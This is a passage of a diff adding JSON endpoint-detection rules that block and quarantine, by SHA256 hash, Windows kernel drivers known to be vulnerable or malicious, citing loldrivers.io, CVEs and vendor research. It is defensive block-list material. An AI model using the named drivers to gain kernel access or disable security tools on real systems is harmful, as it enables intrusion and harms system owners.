+ "id": "fa0dbbd9-0611-5ba5-a59d-12de3508900c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.474797Z",
+ "creation_date": "2026-03-23T11:45:30.474800Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.474809Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6522fc68fa686a546cd98142b90e5bcbfb8b79127cfb38b9a1249996d3d102dc",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fa13a02f-465c-5ebf-be64-93c774e44dc2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.819172Z",
+ "creation_date": "2026-03-23T11:45:31.819174Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.819180Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bcb0af2a4110eed3b300569c081426799f44d20ede6db745f2014e887c9bf494",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fa1da3f5-b8a6-5d23-b9b5-d96c39be1878",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.466580Z",
+ "creation_date": "2026-03-23T11:45:30.466583Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.466592Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4999541c47abd4a7f2a002c180ae8d31c19804ce538b85870b8db53d3652862b",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fa26f938-10f4-5567-9516-2c556f033706",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983104Z",
+ "creation_date": "2026-03-23T11:45:29.983106Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983111Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "81c7bb39100d358f8286da5e9aa838606c98dfcc263e9a82ed91cd438cb130d1",
+ "comment": "Malicious Kernel Driver (aka wantd_3.sys) [https://www.loldrivers.io/drivers/a22104a8-126d-449f-ba3e-28678c60c587/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fa29acc7-bd3b-5a57-87be-debe5cc9f3d4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613701Z",
+ "creation_date": "2026-03-23T11:45:29.613703Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613708Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "552f70374715e70c4ade591d65177be2539ec60f751223680dfaccb9e0be0ed9",
+ "comment": "BioStar Microtech drivers vulnerable to kernel memory mapping function (aka BSMEMx64.sys, BSMIXP64.sys, BSMIx64.sys, BS_Flash64.sys, BS_HWMIO64_W10.sys, BS_HWMIo64.sys and BS_I2c64.sys) [https://www.loldrivers.io/drivers/9e87b6b0-00ed-4259-bcd7-05e2c924d58c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fa2c8db6-40a5-54a9-b387-0358d2de1dc6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979429Z",
+ "creation_date": "2026-03-23T11:45:29.979431Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979436Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bb2422e96ea993007f25c71d55b2eddfa1e940c89e895abb50dd07d7c17ca1df",
+ "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fa36969f-32d9-5a42-bc76-c9b04b85d871",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.453372Z",
+ "creation_date": "2026-03-23T11:45:30.453376Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.453385Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "714d8791e37373f92f0242a6694cc232686caab69d7ae64b5ed31094cc352893",
+ "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fa38521f-fe82-5d6b-ac97-5773591e7eba",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835647Z",
+ "creation_date": "2026-03-23T11:45:30.835649Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835655Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8fe64d42542f5546eb8c0a5e1da77ff237585d855344a8f63293ab86d1d56fc0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fa4428fb-3305-572e-bce5-8006479d5538",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.484848Z",
+ "creation_date": "2026-03-23T11:45:31.484852Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.484863Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "356250aa436af02d651c84ba93f674f094e8a98563f58e39fd78cdbdf0e86353",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fa55fdb2-091a-5f8d-b9a2-a20744e4f7f3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825971Z",
+ "creation_date": "2026-03-23T11:45:31.825973Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825979Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "37527e11e7c25b8b0390a22bfecff2919f261c780e631739ef6acbe9085b674d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fa6574f1-01ca-5ca6-bf2f-44973a4a5dba",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832058Z",
+ "creation_date": "2026-03-23T11:45:30.832060Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832066Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "679c486ab26be098b8cd8bbc2b604eb94eebbb0265f79ccd91fa4d968b406d3e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fa733f42-6a87-5377-86e2-3da723ba4cfc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151810Z",
+ "creation_date": "2026-03-23T11:45:31.151814Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151823Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "90044e79b27d7e5f9afac7f8d5025ad695bdda4f4a9023d2883a02f2c17b13f2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fa79fb52-7836-5ad5-93ed-2e26ce2eeb32",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605926Z",
+ "creation_date": "2026-03-23T11:45:29.605928Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605934Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bced04bdefad6a08c763265d6993f07aa2feb57d33ed057f162a947cf0e6668f",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fa8815db-5e3d-5372-9faf-655f2c9331d3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974696Z",
+ "creation_date": "2026-03-23T11:45:29.974698Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974703Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "92bb92314ad69e9d118df55924ddab76b983029f1eae7739bbb098c6bea86ca1",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fa8a7006-79c8-56b4-8261-70af7dd4c359",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617575Z",
+ "creation_date": "2026-03-23T11:45:29.617577Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617582Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "73a0ccf3e32c262142bde91c19f5b1f395878783f157c6bed5874ede5a3afddd",
+ "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fa9503ed-995a-5d9c-b512-0e12d74f46ab",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967117Z",
+ "creation_date": "2026-03-23T11:45:29.967121Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967130Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f5c267770f18d720313eedc7ff363989b04b21394e7c0179088d74b4d0fb2630",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fa975892-b079-51dd-ac70-ce2ca2c1e022",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826962Z",
+ "creation_date": "2026-03-23T11:45:30.826964Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826970Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "46257866237fe03e590247dc39daa60635c136eaab3e2c941944ff3348f17cfa",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "faba1390-bece-5496-bb6a-29630672dca3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.486167Z",
+ "creation_date": "2026-03-23T11:45:31.486171Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.486181Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "244cf5603ec4960b86137f9bd58877b890871a961061b1160ddfddead099170f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fabaf23a-9cdc-5bde-8574-0a22fd6295e2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143881Z",
+ "creation_date": "2026-03-23T11:45:32.143883Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143889Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ebf6be42d39fd5d9361afa43479f883ff8eba97d72f313ece289f78cb51c22f2",
+ "comment": "Vulnerable Kernel Driver (aka Afd.sys) [https://www.loldrivers.io/drivers/394f49b2-2d78-4d0d-b374-1399695455f3/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fabdc89c-665b-564b-81fc-bb3d16021c83",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826813Z",
+ "creation_date": "2026-03-23T11:45:31.826815Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826820Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "806a9d7578501708a51b0ba5dbd983213dc0dd9ef3818e7b4df2ce520f66dc0c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fabdecc6-6e04-559b-870a-ca18a1b5183d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979585Z",
+ "creation_date": "2026-03-23T11:45:29.979587Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979592Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6ee267fc3d0ac2662a9cfdb0ed5a2354ee09ef4c218303f20350177cae125cf7",
+ "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fac04190-ac64-54a0-9a24-55afd3585784",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826848Z",
+ "creation_date": "2026-03-23T11:45:31.826850Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826856Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5da0f06fdf2f531ce5caac5ea77238fe13fbc3d8bada7bbb36fc1eaa07799a32",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fac2f9c1-1536-51fa-aef8-0d00befff49a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
